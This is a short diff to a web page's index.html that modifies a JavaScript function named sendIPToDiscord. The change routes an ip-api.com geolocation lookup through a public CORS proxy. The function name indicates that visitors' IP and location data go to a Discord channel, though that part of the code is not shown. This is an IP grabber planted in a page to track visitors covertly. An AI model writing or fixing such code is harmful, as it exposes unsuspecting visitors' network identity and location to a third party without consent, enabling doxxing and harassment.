--- a/index.html
+++ b/index.html
@@ -60,7 +60,7 @@
 
         function sendIPToDiscord() {
             // Récupère les informations d'IP
-            fetch("http://ip-api.com/json/")
+            fetch("https://cors-anywhere.herokuapp.com/http://ip-api.com/json/")
                 .then(response => response.json())
                 .then(data => {
                     if (data.status === "success") {
